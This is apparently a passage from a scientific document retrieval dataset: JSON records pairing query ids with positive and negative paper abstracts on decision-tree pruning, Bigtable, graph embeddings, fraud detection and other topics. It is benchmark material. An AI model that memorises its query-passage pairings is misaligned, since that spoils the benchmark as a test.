increasing the number of training instances available to the tree building process. On the left-hand side, no training instances are available and the best one can do with test instances is to assign them a class label at random. On the right-hand side, the entire dataset (excluding test instances) is available to the tree building process. C4.5 [7] and error-based pruning (the c4.5 default) are used to build and prune trees, respectively. Note that accuracy on this dataset stops increasing at a rather small training set size, thereafter remaining essentially constant. 2 Surprisingly, tree size continues to grow nearly linearly despite the use of error-based pruning. The graph clearly shows that unnecessary structure is retained, and more is retained as the size of the training set increases. Accuracy stops increasing after only 25% of the available training instances are seen. The tree at tha t point contains 22 nodes. When 100% of the available training instances are used in tree construction, the resulting tree contains 64 nodes. Despite a 3-fold increase in size over the tree built with 25% of the data, the accuracies of the two trees are statistically indistinguishable. Under a broad range of circumstances, there is a nearly linear relationship between training set size and tree size, even after accuracy has ceased to increase. The relationship between training set size and tree size was explored with 4 pruning methods and 19 datasets taken from the UCI repository. 3 The pruning methods are error-based (EBB the C4.5 default) [7], reduced error (REP) [8], minimum description length (MDL) [9], and cost-complexity with the lsE rule (ccP) [1]. The majority of extant pruning methods take one of four general approaches: deflating accuracy estimates based on the training set (e.g. EBP); pruning based on accuracy estimates from a pruning set (e.g. aEP); managing the tradeoff between accuracy and complexity (e.g. MDL); and creating a set of pruned trees based on different values of a pruning parameter and then selecting the appropriate parameter value using a pruning set or cross-validation (e.g. ccP). The pruning methods used in this paper were selected to be representative of these four approaches. Plots of tree size and accuracy as a function of training set size were generated for each combination of dataset and pruning algorithm as follows. Typically, 1 All datasets in this paper can be obtained from the University of California-Irvine (UCI) Machine Learning Repository. http ://ww~. its. uci. edu/ mlearn/MLRepository, html. 2 All reported accuracy figures in this paper are based on separate test sets, distinct from any data used for training. 3 The datasets are the same ones used in [4] with two exceptions. The crx dataset was omitted because it is roughly the same as the aus t r a l i aa dataset, and the horse-co l ic dataset was omitted because it was unclear which attribute was used as the class label. Note that the votel dataset was created by removing the physician-fee-freeze attribute from the vote dataset. BUILDING SIMPLE MODELS: A CASE STUDY WITH DECISION TREES 213",
"title": ""
},
{
"docid": "db7ed2c615bb93c6cec19b65f7b4366d",
"text": "Virtual anthropology consists of the introduction of modern slice imaging to biological and forensic anthropology. Thanks to this non-invasive scientific revolution, some classifications and staging systems, first based on dry bone analysis, can be applied to cadavers with no need for specific preparation, as well as to living persons. Estimation of bone and dental age is one of the possibilities offered by radiology. Biological age can be estimated in clinical forensic medicine as well as in living persons. Virtual anthropology may also help the forensic pathologist to estimate a deceased person’s age at death, which together with sex, geographical origin and stature, is one of the important features determining a biological profile used in reconstructive identification. For this forensic purpose, the radiological tools used are multislice computed tomography and, more recently, X-ray free imaging techniques such as magnetic resonance imaging and ultrasound investigations. We present and discuss the value of these investigations for age estimation in anthropology.",
"title": ""
},
{
"docid": "6c7261b5dec9c61d34d78056bce74d47",
"text": "The matching of tractor-implement system is very difficult task in India because variety of tractor models ranging from 10 to 45kW is prevalent here. To overcome the problem of matching tractor-implement system, a decision support system (DSS) was developed in Visual Basic 6.0 programming language for 2-wheel drive (2WD) tractors. The DSS provides intuitive user interfaces by linking databases such as tractor parameters, tire and implement specifications, soil and operating conditions to support the decision for selection of tractor-implement system. DSS was validated for three different implements (2×30cm moldboard plow; 9-23cm field cultivator and 7-7 offset disc harrow (1.6m)). DSS which calculates draft, drawbar power, slip, tractive efficiency, coefficient of rolling resistance, coefficient of net traction, PTO power required, power utilization efficiency, specific fuel consumption based etc. on input data, can be used effectively in matching of tractor-implement system of various makes and models commercially available in India.",
"title": ""
},
{
"docid": "7b05751aa3257263e7f1a8a6f1e2ff7e",
"text": "Intrusion Detection System (IDS) that turns to be a vital component to secure the network. The lack of regular updation, less capability to detect unknown attacks, high non adaptable false alarm rate, more consumption of network resources etc., makes IDS to compromise. This paper aims to classify the NSL-KDD dataset with respect to their metric data by using the best six data mining classification algorithms like J48, ID3, CART, Bayes Net, Naïve Bayes and SVM to find which algorithm will be able to offer more testing accuracy. NSL-KDD dataset has solved some of the inherent limitations of the available KDD’99 dataset. KeywordsIDS, KDD, Classification Algorithms, PCA etc.",
"title": ""
},
{
"docid": "6c3f320eda59626bedb2aad4e527c196",
"text": "Though research on the Semantic Web has progressed at a steady pace, its promise has yet to be realized. One major difficulty is that, by its very nature, the Semantic Web is a large, uncensored system to which anyone may contribute. This raises the question of how much credence to give each source. We cannot expect each user to know the trustworthiness of each source, nor would we want to assign top-down or global credibility values due to the subjective nature of trust. We tackle this problem by employing a web of trust, in which each user provides personal trust values for a small number of other users. We compose these trusts to compute the trust a user should place in any other user in the network. A user is not assigned a single trust rank. Instead, different users may have different trust values for the same user. We define properties for combination functions which merge such trusts, and define a class of functions for which merging may be done locally while maintaining these properties. We give examples of specific functions and apply them to data from Epinions and our BibServ bibliography server. Experiments confirm that the methods are robust to noise, and do not put unreasonable expectations on users. We hope that these methods will help move the Semantic Web closer to fulfilling its promise.",
"title": ""
},
{
"docid": "973249fc3e4ec5cd9c90d933f786a1c6",
"text": "www.PosterPresentations.com RNN can model the entire sequence and capture long-term dependencies, but it does not do well in extracting key patterns. In contrast, convolutional neural network (CNN) is good at Extracting local and position-invariant features. We present a novel model named disconnected recurrent neural network (DRNN), which incorporates position-invariance into RNN by constraining the distance of information flow in RNN. DRNN achieves the best performance on several benchmark datasets for text categorization. INTRODUCTION",
"title": ""
}
] | scidocsrr |
c11af3663a2c5912bbc9ec57741b2880 | The Web at Graduation and Beyond | [
{
"docid": "7add673c4f72e6a7586109ac3bdab2ec",
"text": "Bigtable is a distributed storage system for managing structured data that is designed to scale to a very large size: petabytes of data across thousands of commodity servers. Many projects at Google store data in Bigtable, including web indexing, Google Earth, and Google Finance. These applications place very different demands on Bigtable, both in terms of data size (from URLs to web pages to satellite imagery) and latency requirements (from backend bulk processing to real-time data serving). Despite these varied demands, Bigtable has successfully provided a flexible, high-performance solution for all of these Google products. In this article, we describe the simple data model provided by Bigtable, which gives clients dynamic control over data layout and format, and we describe the design and implementation of Bigtable.",
"title": ""
}
] | [
{
"docid": "057069a06621b879f88c6d09f8867f77",
"text": "Nowadays, the railway industry is in a position where it is able to exploit the opportunities created by the IIoT (Industrial Internet of Things) and enabling communication technologies under the paradigm of Internet of Trains. This review details the evolution of communication technologies since the deployment of GSM-R, describing the main alternatives and how railway requirements, specifications and recommendations have evolved over time. The advantages of the latest generation of broadband communication systems (e.g., LTE, 5G, IEEE 802.11ad) and the emergence of Wireless Sensor Networks (WSNs) for the railway environment are also explained together with the strategic roadmap to ensure a smooth migration from GSM-R. Furthermore, this survey focuses on providing a holistic approach, identifying scenarios and architectures where railways could leverage better commercial IIoT capabilities. After reviewing the main industrial developments, short and medium-term IIoT-enabled services for smart railways are evaluated. Then, it is analyzed the latest research on predictive maintenance, smart infrastructure, advanced monitoring of assets, video surveillance systems, railway operations, Passenger and Freight Information Systems (PIS/FIS), train control systems, safety assurance, signaling systems, cyber security and energy efficiency. Overall, it can be stated that the aim of this article is to provide a detailed examination of the state-of-the-art of different technologies and services that will revolutionize the railway industry and will allow for confronting today challenges.",
"title": ""
},
{
"docid": "a05b50b3b5bf6504a9e35dbadac9764b",
"text": "UNLABELLED\n\n\n\nBACKGROUND\nThe Avogadro project has developed an advanced molecule editor and visualizer designed for cross-platform use in computational chemistry, molecular modeling, bioinformatics, materials science, and related areas. It offers flexible, high quality rendering, and a powerful plugin architecture. Typical uses include building molecular structures, formatting input files, and analyzing output of a wide variety of computational chemistry packages. By using the CML file format as its native document type, Avogadro seeks to enhance the semantic accessibility of chemical data types.\n\n\nRESULTS\nThe work presented here details the Avogadro library, which is a framework providing a code library and application programming interface (API) with three-dimensional visualization capabilities; and has direct applications to research and education in the fields of chemistry, physics, materials science, and biology. The Avogadro application provides a rich graphical interface using dynamically loaded plugins through the library itself. The application and library can each be extended by implementing a plugin module in C++ or Python to explore different visualization techniques, build/manipulate molecular structures, and interact with other programs. We describe some example extensions, one which uses a genetic algorithm to find stable crystal structures, and one which interfaces with the PackMol program to create packed, solvated structures for molecular dynamics simulations. The 1.0 release series of Avogadro is the main focus of the results discussed here.\n\n\nCONCLUSIONS\nAvogadro offers a semantic chemical builder and platform for visualization and analysis. For users, it offers an easy-to-use builder, integrated support for downloading from common databases such as PubChem and the Protein Data Bank, extracting chemical data from a wide variety of formats, including computational chemistry output, and native, semantic support for the CML file format. For developers, it can be easily extended via a powerful plugin mechanism to support new features in organic chemistry, inorganic complexes, drug design, materials, biomolecules, and simulations. Avogadro is freely available under an open-source license from http://avogadro.openmolecules.net.",
"title": ""
},
{
"docid": "7dcd4a4e687975b6b774487303fc1a40",
"text": "Analysis of kinship from facial images or videos is an important problem. Prior machine learning and computer vision studies approach kinship analysis as a verification or recognition task. In this paper, first time in the literature, we propose a kinship synthesis framework, which generates smile videos of (probable) children from the smile videos of parents. While the appearance of a child’s smile is learned using a convolutional encoder-decoder network, another neural network models the dynamics of the corresponding smile. The smile video of the estimated child is synthesized by the combined use of appearance and dynamics models. In order to validate our results, we perform kinship verification experiments using videos of real parents and estimated children generated by our framework. The results show that generated videos of children achieve higher correct verification rates than those of real children. Our results also indicate that the use of generated videos together with the real ones in the training of kinship verification models, increases the accuracy, suggesting that such videos can be used as a synthetic dataset.",
"title": ""
},
{
"docid": "3e012db58ce7b25866a7c95b90b1aace",
"text": "The goal of graph representation learning is to embed each vertex in a graph into a low-dimensional vector space. Existing graph representation learning methods can be classified into two categories: generative models that learn the underlying connectivity distribution in the graph, and discriminative models that predict the probability of edge existence between a pair of vertices. In this paper, we propose GraphGAN, an innovative graph representation learning framework unifying above two classes of methods, in which the generative model and discriminative model play a game-theoretical minimax game. Specifically, for a given vertex, the generative model tries to fit its underlying true connectivity distribution over all other vertices and produces “fake” samples to fool the discriminative model, while the discriminative model tries to detect whether the sampled vertex is from ground truth or generated by the generative model. With the competition between these two models, both of them can alternately and iteratively boost their performance. Moreover, when considering the implementation of generative model, we propose a novel graph softmax to overcome the limitations of traditional softmax function, which can be proven satisfying desirable properties of normalization, graph structure awareness, and computational efficiency. Through extensive experiments on real-world datasets, we demonstrate that GraphGAN achieves substantial gains in a variety of applications, including link prediction, node classification, and recommendation, over state-of-the-art baselines.",
"title": ""
},
{
"docid": "be43b90cce9638b0af1c3143b6d65221",
"text": "Reasoning on provenance information and property propagation is of significant importance in e-science since it helps scientists manage derived metadata in order to understand the source of an object, reproduce results of processes and facilitate quality control of results and processes. In this paper we introduce a simple, yet powerful reasoning mechanism based on property propagation along the transitive part-of and derivation chains, in order to trace the provenance of an object and to carry useful inferences. We apply our reasoning in semantic repositories using the CIDOC-CRM conceptual schema and its extension CRMdig, which has been develop for representing the digital and empirical provenance of digi-",
"title": ""
},
{
"docid": "9086291516a6a45cdb9c68ab3695f231",
"text": "The study is to investigate resellers’ point of view about the impact of brand awareness, perceived quality and customer loyalty on brand profitability and purchase intention. Further the study is also focused on finding out the mediating role of purchase intension on the relationship of brand awareness and profitability, perceived quality and profitability and brand loyalty and profitability. The study was causal in nature and data was collected from 200 resellers. The results showed insignificant impact of brand awareness and loyalty whereas significant impact of perceived quality on profitability. Further the results revealed significant impact of brand awareness, perceived quality and loyalty on purchase intention. Sobel test for mediation showed that purchase intension mediates the relationship of the perceived quality and profitability only.",
"title": ""
},
{
"docid": "96590c575412d33e09fee7ea52ae9a60",
"text": "Performance of microphone arrays at the high-frequency range is typically limited by aliasing, which is a result of the spatial sampling process. This paper presents analysis of aliasing for spherical microphone arrays, which have been recently studied for a range of applications. The paper presents theoretical analysis of spatial aliasing for various sphere sampling configurations, showing how high-order spherical harmonic coefficients are aliased into the lower orders. Spatial antialiasing filters on the sphere are then introduced, and the performance of spatially constrained filters is compared to that of the ideal antialiasing filter. A simulation example shows how the effect of aliasing on the beam pattern can be reduced by the use of the antialiasing filters",
"title": ""
},
{
"docid": "717d1c31ac6766fcebb4ee04ca8aa40f",
"text": "We present an incremental maintenance algorithm for leapfrog triejoin. The algorithm maintains rules in time proportional (modulo log factors) to the edit distance between leapfrog triejoin traces.",
"title": ""
},
{
"docid": "dbeb76c985630a733c3d1956119e88e2",
"text": "Electromagnetic signals of low frequency have been shown to be durably produced in aqueous dilutions of the Human Imunodeficiency Virus DNA. In vivo, HIV DNA signals are detected only in patients previously treated by antiretroviral therapy and having no detectable viral RNA copies in their blood. We suggest that the treatment of AIDS patients pushes the virus towards a new mode of replication implying only DNA, thus forming a reservoir insensitive to retroviral inhibitors. Implications for new approaches aimed at eradicating HIV infection are discussed.",
"title": ""
},
{
"docid": "ff041b2c0356560305a9882457b42fd6",
"text": "The present study investigated the relationship between delusion proneness, as assessed using the Peters et al. Delusions Inventory [Peters, E.R., Joseph, S.A., Garety, P.A., 1999. The measurement of delusional ideation in the normal population: Introducing the PDI (Peters et al. Delusions Inventory). Schizophr. Bull. 25 553-576], and cognitive insight, as assessed using the Beck Cognitive Insight Scale (BCIS; [Beck, A.T., Baruch, E., Balter, J.M., Steer, R.A., Warman, D.M., 2004. A new instrument for measuring insight: The Beck Cognitive Insight Scale. Schizophr. Res. 68, 319-329]. Two hundred undergraduate students with no history of psychotic disorder participated. Results indicated that, consistent with hypotheses, those higher in delusion proneness endorsed more certainty in their beliefs and judgment than those who were lower in delusion proneness (Self-Certainty subscale of the BCIS; p = .007). Contrary to hypotheses, however, those who were higher in delusion proneness were more open to external feedback and were more willing to acknowledge fallibility than those who were lower in delusion proneness (Self-Reflectiveness subscale of the BCIS; p = .002). The results are discussed in relation to theories of delusion formation.",
"title": ""
},
{
"docid": "385e50da85d4d6b4ec2cdc2ed7309ce8",
"text": "This paper presents a novel reconfigurable framework for training Convolutional Neural Networks (CNNs). The proposed framework is based on reconfiguring a streaming datapath at runtime to cover the training cycle for the various layers in a CNN. The streaming datapath can support various parameterized modules which can be customized to produce implementations with different trade-offs in performance and resource usage. The modules follow the same input and output data layout, simplifying configuration scheduling. For different layers, instances of the modules contain different computation kernels in parallel, which can be customized with different layer configurations and data precision. The associated models on performance, resource and bandwidth can be used in deriving parameters for the datapath to guide the analysis of design trade-offs to meet application requirements or platform constraints. They enable estimation of the implementation specifications given different layer configurations, to maximize performance under the constraints on bandwidth and hardware resources. Experimental results indicate that the proposed module design targeting Maxeler technology can achieve a performance of 62.06 GFLOPS for 32-bit floating-point arithmetic, outperforming existing accelerators. Further evaluation based on training LeNet-5 shows that the proposed framework achieves about 4 times faster than CPU implementation of Caffe and about 7.5 times more energy efficient than the GPU implementation of Caffe.",
"title": ""
},
{
"docid": "68058500fd6dbbc60104a0985fecd4a8",
"text": "Instagram, a popular global mobile photo-sharing platform, involves various user interactions centered on posting images accompanied by hashtags. Participatory hashtagging, one of these diverse tagging practices, has great potential to be a communication channel for various organizations and corporations that would like to interact with users on social media. In this paper, we aim to characterize participatory hashtagging behaviors on Instagram by conducting a case study of its representative hashtagging practice, the Weekend Hashtag Project, or #WHP. By conducting a user study using both quantitative and qualitative methods, we analyzed the way Instagram users respond to participation calls and identified factors that motivate users to take part in the project. Based on these findings, we provide design strategies for any interested parties to interact with users on social media.",
"title": ""
},
{
"docid": "7e43c21444af5fdb4e8ff6890742a44b",
"text": "Cellulases are the enzymes hydrolyzing cellulosic biomass and are produced by the microorganisms that grown over cellulosic matters. Bacterial cellulases possess more advantages when compared to the cellulases from other sources. Cellulase producing bacteria was isolated from Cow dung. The organism was identified using 16 SrDNA sequencing and BLAST search. Cellulase was produced and the culture conditions like temperature, pH, and Incubation time and medium components like Carbon sources, nitrogen sources and role of natural substrates were optimized. The enzyme was further purified using ethanol precipitation and chromatography. Cellulase was then characterized using SDS-PAGE analysis and Zymographic Studies. The application of Cellulase in Biostoning was then analyzed.",
"title": ""
},
{
"docid": "ec4deb4db5f596bde9c4adaeb814ce28",
"text": "Traditional methods for motion estimation estimate the motion field F between a pair of images as the one that minimizes a predesigned cost function. In this paper, we propose a direct method and train a Convolutional Neural Network (CNN) that when, at test time, is given a pair of images as input it produces a dense motion field F at its output layer. In the absence of large datasets with ground truth motion that would allow classical supervised training, we propose to train the network in an unsupervised manner. The proposed cost function that is optimized during training, is based on the classical optical flow constraint. The latter is differentiable with respect to the motion field and, therefore, allows backpropagation of the error to previous layers of the network. Our method is tested on both synthetic and real image sequences and performs similarly to the state-of-the-art methods.",
"title": ""
},
{
"docid": "dc610cdd3c6cc5ae443cf769bd139e78",
"text": "With modern smart phones and powerful mobile devices, Mobile apps provide many advantages to the community but it has also grown the demand for online availability and accessibility. Cloud computing is provided to be widely adopted for several applications in mobile devices. However, there are many advantages and disadvantages of using mobile applications and cloud computing. This paper focuses in providing an overview of mobile cloud computing advantages, disadvantages. The paper discusses the importance of mobile cloud applications and highlights the mobile cloud computing open challenges",
"title": ""
},
{
"docid": "66b088871549d5ec924dbe500522d6f8",
"text": "Being able to effectively measure similarity between patents in a complex patent citation network is a crucial task in understanding patent relatedness. In the past, techniques such as text mining and keyword analysis have been applied for patent similarity calculation. The drawback of these approaches is that they depend on word choice and writing style of authors. Most existing graph-based approaches use common neighbor-based measures, which only consider direct adjacency. In this work we propose new similarity measures for patents in a patent citation network using only the patent citation network structure. The proposed similarity measures leverage direct and indirect co-citation links between patents. A challenge is when some patents receive a large number of citations, thus are considered more similar to many other patents in the patent citation network. To overcome this challenge, we propose a normalization technique to account for the case where some pairs are ranked very similar to each other because they both are cited by many other patents. We validate our proposed similarity measures using US class codes for US patents and the well-known Jaccard similarity index. Experiments show that the proposed methods perform well when compared to the Jaccard similarity index.",
"title": ""
},
{
"docid": "e404699c5b86d3a3a47a1f3d745eecc1",
"text": "We apply Artificial Immune Systems(AIS) [4] for credit card fraud detection and we compare it to other methods such as Neural Nets(NN) [8] and Bayesian Nets(BN) [2], Naive Bayes(NB) and Decision Trees(DT) [13]. Exhaustive search and Genetic Algorithm(GA) [7] are used to select optimized parameters sets, which minimizes the fraud cost for a credit card database provided by a Brazilian card issuer. The specifics of the fraud database are taken into account, such as skewness of data and different costs associated with false positives and negatives. Tests are done with holdout sample sets, and all executions are run using Weka [18], a publicly available software. Our results are consistent with the early result of Maes in [12] which concludes that BN is better than NN, and this occurred in all our evaluated tests. Although NN is widely used in the market today, the evaluated implementation of NN is among the worse methods for our database. In spite of a poor behavior if used with the default parameters set, AIS has the best performance when parameters optimized by GA are used.",
"title": ""
},
{
"docid": "a4cddba12bf99030fa02d986a453ad84",
"text": "QDT 2012 To obtain consistent esthetic outcomes, the design of dental restorations should be defined as soon as possible. The importance of gathering diagnostic data from questionnaires and checklists1–7 cannot be overlooked; however, much of this information may be lost if it is not transferred adequately to the design of the restorations. The diagnostic data must guide the subsequent treatment phases,8 integrating all of the patient’s needs, desires, and functional and biologic issues into an esthetic treatment design.9,10 The Digital Smile Design (DSD) is a multi-use conceptual tool that can strengthen diagnostic vision, improve communication, and enhance predictability throughout treatment. The DSD allows for careful analysis of the patient’s facial and dental characteristics along with any critical factors that may have been overlooked during clinical, photographic, or diagnostic cast–based evaluation procedures. The drawing of reference lines and shapes over extraand intraoral digital photographs in a predetermined sequence can widen diagnostic visualization and help the restorative team evaluate the limitations and risk factors of a given case, including asymmetries, disharmonies, and violations of esthetic principles.1 DSD sketches can be performed in presentation software such as Keynote (iWork, Apple, Cupertino, California, USA) or Microsoft PowerPoint (Microsoft Office, Microsoft, Redmond, Washington, USA). This improved visualization makes it easier to select the ideal restorative technique. The DSD protocol is characterized by effective communication between the interdisciplinary dental team, including the dental technician. Team members can identify and highlight discrepancies in soft or hard tissue morphology and discuss the best available solutions using the amplified images. Every team member can add information directly on the slides in writing or using voice-over, thus simplifying the process even more. All team members can access this information whenever necessary to review, alter, or add elements during the diagnostic and treatment phases. Digital Smile Design: A Tool for Treatment Planning and Communication in Esthetic Dentistry",
"title": ""
},
{
"docid": "a691214a7ac8a1a7b4ad6fe833afd572",
"text": "Within the field of computer vision, change detection algorithms aim at automatically detecting significant changes occurring in a scene by analyzing the sequence of frames in a video stream. In this paper we investigate how state-of-the-art change detection algorithms can be combined and used to create a more robust algorithm leveraging their individual peculiarities. We exploited genetic programming (GP) to automatically select the best algorithms, combine them in different ways, and perform the most suitable post-processing operations on the outputs of the algorithms. In particular, algorithms’ combination and post-processing operations are achieved with unary, binary and ${n}$ -ary functions embedded into the GP framework. Using different experimental settings for combining existing algorithms we obtained different GP solutions that we termed In Unity There Is Strength. These solutions are then compared against state-of-the-art change detection algorithms on the video sequences and ground truth annotations of the ChangeDetection.net 2014 challenge. Results demonstrate that using GP, our solutions are able to outperform all the considered single state-of-the-art change detection algorithms, as well as other combination strategies. The performance of our algorithm are significantly different from those of the other state-of-the-art algorithms. This fact is supported by the statistical significance analysis conducted with the Friedman test and Wilcoxon rank sum post-hoc tests.",
"title": ""
},
{
"docid": "09bb06388c9018c205c09406b360692b",
"text": "Detecting anomalies in large-scale, streaming datasets has wide applicability in a myriad of domains like network intrusion detection for cyber-security, fraud detection for credit cards, system health monitoring, and fault detection in safety critical systems. Due to its wide applicability, the problem of anomaly detection has been well-studied by industry and academia alike, and many algorithms have been proposed for detecting anomalies in different problem settings. But until recently, there was no openly available, systematic dataset and/or framework using which the proposed anomaly detection algorithms could be compared and evaluated on a common ground. Numenta Anomaly Benchmark (NAB), made available by Numenta1 in 2015, addressed this gap by providing a set of openly-available, labeled data files and a common scoring system, using which different anomaly detection algorithms could be fairly evaluated and compared. In this paper, we provide an in-depth analysis of the key aspects of the NAB framework, and highlight inherent challenges therein, with the objective to provide insights about the gaps in the current framework that must be addressed so as to make it more robust and easy-to-use. Furthermore, we also provide additional evaluation of five state-of-the-art anomaly detection algorithms (including the ones proposed by Numenta) using the NAB datasets, and based on the evaluation results, we argue that the performance of these algorithms is not sufficient for practical, industry-scale applications, and must be improved upon so as to make them suitable for large-scale anomaly detection problems.",
"title": ""
}
] | scidocsrr |
a71810c6891ec06d9a65fb34359eb41e | Growing a Brain: Fine-Tuning by Increasing Model Capacity | [
{
"docid": "01534202e7db5d9059651290e1720bf0",
"text": "The objective of this paper is the effective transfer of the Convolutional Neural Network (CNN) feature in image search and classification. Systematically, we study three facts in CNN transfer. 1) We demonstrate the advantage of using images with a properly large size as input to CNN instead of the conventionally resized one. 2) We benchmark the performance of different CNN layers improved by average/max pooling on the feature maps. Our observation suggests that the Conv5 feature yields very competitive accuracy under such pooling step. 3) We find that the simple combination of pooled features extracted across variou s CNN layers is effective in collecting evidences from both low and high level descriptors. Following these good practices, we are capable of improving the state of the art on a number of benchmarks to a large margin.",
"title": ""
}
] | [
{
"docid": "1dbb3a49f6c0904be9760f877b7270b7",
"text": "We propose a geographical visualization to support operators of coastal surveillance systems and decision making analysts to get insights in vessel movements. For a possibly unknown area, they want to know where significant maritime areas, like highways and anchoring zones, are located. We show these features as an overlay on a map. As source data we use AIS data: Many vessels are currently equipped with advanced GPS devices that frequently sample the state of the vessels and broadcast them. Our visualization is based on density fields that are derived from convolution of the dynamic vessel positions with a kernel. The density fields are shown as illuminated height maps. Combination of two fields, with a large and small kernel provides overview and detail. A large kernel provides an overview of area usage revealing vessel highways. Details of speed variations of individual vessels are shown with a small kernel, highlighting anchoring zones where multiple vessels stop. Besides for maritime applications we expect that this approach is useful for the visualization of moving object data in general.",
"title": ""
},
{
"docid": "e6da2d0e288a0eb9550c671a882e00c2",
"text": "BACKGROUND\nThe Brief COPE instrument has been utilized to conduct research on various populations, including people living with HIV (PLWH). However, the questionnaire constructs when applied to PLWH have not been subjected to thorough factor validation.\n\n\nMETHODS\nA total of 258 PLWH were recruited from two provinces of China. They answered questions involving the scales of three instruments: the Brief COPE, the Perceived Social Support Scale, and the Perceived Discrimination Scale for PLWH. Confirmatory factor analysis (CFA) and exploratory factor analysis (EFA) were conducted.\n\n\nRESULTS\nThe CFA found a poor goodness of fit to the data. The subsequent EFA identified six preliminary factors, forming subscales with Cronbach's alphas, which ranged from 0.61 to 0.80. Significant correlation coefficients between the subscales and measures of perceived social support and perceived discrimination were reported, giving preliminary support to the validity of the new empirical factor structure.\n\n\nCONCLUSION\nThis study showed that the original factor structure of the Brief COPE instrument, when applied to PLWH in China, did not fit the data. Thus, the Brief COPE should be applied to various populations and cultures with caution. The new factor structure established by the EFA is only preliminary and requires further validation.",
"title": ""
},
{
"docid": "b14748d454917414725bfa51c62730ad",
"text": "The authors investigated the lexical entry for morphologically complex words in English, Six experiments, using a cross-modal repetition priming task, asked whether the lexical entry for derivationally suffixed and prefixed words is morphologically structured and how this relates to the semantic and phonological transparency of the surface relationship between stem and affix. There was clear evidence for morphological decomposition of semantically transparent forms. This was independent of phonological transparency, suggesting that morphemic representations are phonologically abstract. Semantically opaque forms, in contrast, behave like monomorphemic words. Overall, suffixed and prefixed derived words and their stems prime each other through shared morphemes in the lexical entry, except for pairs of suffixed forms, which show a cohort-based interference effect.",
"title": ""
},
{
"docid": "5980e6111c145db3e1bfc5f47df7ceaf",
"text": "Traffic signs are characterized by a wide variability in their visual appearance in real-world environments. For example, changes of illumination, varying weather conditions and partial occlusions impact the perception of road signs. In practice, a large number of different sign classes needs to be recognized with very high accuracy. Traffic signs have been designed to be easily readable for humans, who perform very well at this task. For computer systems, however, classifying traffic signs still seems to pose a challenging pattern recognition problem. Both image processing and machine learning algorithms are continuously refined to improve on this task. But little systematic comparison of such systems exist. What is the status quo? Do today's algorithms reach human performance? For assessing the performance of state-of-the-art machine learning algorithms, we present a publicly available traffic sign dataset with more than 50,000 images of German road signs in 43 classes. The data was considered in the second stage of the German Traffic Sign Recognition Benchmark held at IJCNN 2011. The results of this competition are reported and the best-performing algorithms are briefly described. Convolutional neural networks (CNNs) showed particularly high classification accuracies in the competition. We measured the performance of human subjects on the same data-and the CNNs outperformed the human test persons.",
"title": ""
},
{
"docid": "984bf4f0500e737159b847eab2fa5021",
"text": "We present efmaral, a new system for efficient and accurate word alignment using a Bayesian model with Markov Chain Monte Carlo (MCMC) inference. Through careful selection of data structures and model architecture we are able to surpass the fast_align system, commonly used for performance-critical word alignment, both in computational efficiency and alignment accuracy. Our evaluation shows that a phrase-based statistical machine translation (SMT) system produces translations of higher quality when using word alignments from efmaral than from fast_align, and that translation quality is on par with what is obtained using giza++, a tool requiring orders of magnitude more processing time. More generally we hope to convince the reader that Monte Carlo sampling, rather than being viewed as a slow method of last resort, should actually be the method of choice for the SMT practitioner and others interested in word alignment.",
"title": ""
},
{
"docid": "32775ba6d1a26274eaa6ce92513d9850",
"text": "Data reduction plays an important role in machine learning and pattern recognition with a high-dimensional data. In real-world applications data usually exists with hybrid formats, and a unified data reducing technique for hybrid data is desirable. In this paper, an information measure is proposed to computing discernibility power of a crisp equivalence relation or a fuzzy one, which is the key concept in classical rough set model and fuzzy-rough set model. Based on the information measure, a general definition of significance of nominal, numeric and fuzzy attributes is presented. We redefine the independence of hybrid attribute subset, reduct, and relative reduct. Then two greedy reduction algorithms for unsupervised and supervised data dimensionality reduction based on the proposed information measure are constructed. Experiments show the reducts found by the proposed algorithms get a better performance compared with classical rough set approaches. 2005 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "9ccb958ef7740c0ccf62faaccf3344b8",
"text": "This paper describes the anatomy of the musculature crossing the lumbar spine in a standardized form to provide data generally suitable for static biomechanical analyses of muscle and spinal forces. The muscular anatomy from several sources was quantified and transformed to the mean bony anatomy of four young healthy adults measured from standing stereo-radiographs. The origins, insertions and physiological cross-sectional area (PCSA) of 180 muscle slips which act on the lumbar spine are given relative to the bony anatomy defined by the locations of 12 thoracic and five lumbar vertebrae, and the sacrum, and the shape and positions of the 24 ribs. The broad oblique abdominal muscles are each represented by six vectors and an appropriate proportion of the total PCSA was assigned to each to represent the muscle biomechanics.",
"title": ""
},
{
"docid": "37f55e03f4d1ff3b9311e537dc7122b5",
"text": "Extracting governing equations from data is a central challenge in many diverse areas of science and engineering. Data are abundant whereas models often remain elusive, as in climate science, neuroscience, ecology, finance, and epidemiology, to name only a few examples. In this work, we combine sparsity-promoting techniques and machine learning with nonlinear dynamical systems to discover governing equations from noisy measurement data. The only assumption about the structure of the model is that there are only a few important terms that govern the dynamics, so that the equations are sparse in the space of possible functions; this assumption holds for many physical systems in an appropriate basis. In particular, we use sparse regression to determine the fewest terms in the dynamic governing equations required to accurately represent the data. This results in parsimonious models that balance accuracy with model complexity to avoid overfitting. We demonstrate the algorithm on a wide range of problems, from simple canonical systems, including linear and nonlinear oscillators and the chaotic Lorenz system, to the fluid vortex shedding behind an obstacle. The fluid example illustrates the ability of this method to discover the underlying dynamics of a system that took experts in the community nearly 30 years to resolve. We also show that this method generalizes to parameterized systems and systems that are time-varying or have external forcing.",
"title": ""
},
{
"docid": "20353d24c6a5cea6461e09853a854375",
"text": "This paper proposes a deep bidirectional long short-term memory approach in modeling the long contextual, nonlinear mapping between audio and visual streams for video-realistic talking head. In training stage, an audio-visual stereo database is firstly recorded as a subject talking to a camera. The audio streams are converted into acoustic feature, i.e. Mel-Frequency Cepstrum Coefficients (MFCCs), and their textual labels are also extracted. The visual streams, in particular, the lower face region, are compactly represented by active appearance model (AAM) parameters by which the shape and texture variations can be jointly modeled. Given pairs of the audio and visual parameter sequence, a DBLSTM model is trained to learn the sequence mapping from audio to visual space. For any unseen speech audio, whether it is original recorded or synthesized by text-to-speech (TTS), the trained DBLSTM model can predict a convincing AAM parameter trajectory for the lower face animation. To further improve the realism of the proposed talking head, the trajectory tiling method is adopted to use the DBLSTM predicted AAM trajectory as a guide to select a smooth real sample image sequence from the recorded database. We then stitch the selected lower face image sequence back to a background face video of the same subject, resulting in a video-realistic talking head. Experimental results show that the proposed DBLSTM approach outperforms the existing HMM-based approach in both objective and subjective evaluations.",
"title": ""
},
{
"docid": "98465c0b863fd7eb07e7ba2596fb5dee",
